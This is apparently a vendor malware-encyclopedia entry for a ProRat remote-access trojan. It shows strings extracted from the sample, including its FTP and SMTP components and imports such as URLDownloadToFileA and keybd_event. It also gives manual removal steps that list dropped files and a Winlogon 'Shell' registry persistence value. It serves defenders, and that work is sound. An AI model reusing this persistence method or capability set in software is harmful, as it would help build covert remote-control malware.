@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat Ftp Server
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
JPEG error #%d






Remove it with Ad-Aware




    

  1. Click (here) to download and install Ad-Aware Free Antivirus.
    2. 

  2. Update the definition files.
    3. 

  3. Run a full scan of your computer.
    4. 





Manual removal*




    

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):
    

    %original file name%.exe:2448
    fservice.exe:2124
    lncom.exe:3676
    

    2. 

  2. Delete the original Trojan file.
    3. 

  3. Delete or disinfect the following files created/modified by the Trojan:
    

    C:\DA3E30~1.EXE.bat (75 bytes)
    C:\Windows\System32\lncom_.jpg (14764 bytes)
    C:\da3e304cdec0de2b244930fbf824b069.jpg (601 bytes)
    C:\Windows\System32\lncom.exe (45172 bytes)
    C:\Windows\services.exe (2457 bytes)
    C:\Windows\system\sservice.exe (2105 bytes)
    C:\Windows\System32\lncom.exe.bat (103 bytes)
    C:\Windows\System32\fservice.exe (2457 bytes)
    

    4. 

  4. Remove the references to the Trojan by modifying the following registry value(s) (How to Work with System Registry):
    

    [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
    "Shell" = "Explorer.exe C:\Windows\system32\fservice.exe"
    

    5. 

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
    6. 

  6. Reboot the computer.
    7. 



*Manual removal may cause unexpected system behaviour and should be performed at your own risk.












 
 




 
Average: 2 (1 vote)












				


							


			

				
					  
							

		

		


					
							

	

	
	        


	

        
      
 

      
      

      
    
 

    
  
 

		


		

		
			

			

				

					Lavasoft is the maker of Ad-Aware,
					the world's most popular anti-malware 
					software with over 450 million 
					downloads.
				

				

					© 2026 Lavasoft. All rights reserved.

					Terms Of Use |   Privacy Policy
					


								

			


		

		


	

	
	

	

		x
		
Our best antivirus yet!

		
Fresh new look. Faster scanning. Better protection.

		

			
Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

			
For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

			
			Download adaware antivirus 12
		

		No thanks, continue to lavasoft.com
	

	

		

			close x
			
Discover the new adaware antivirus 12

			
Our best antivirus yet

			Download Now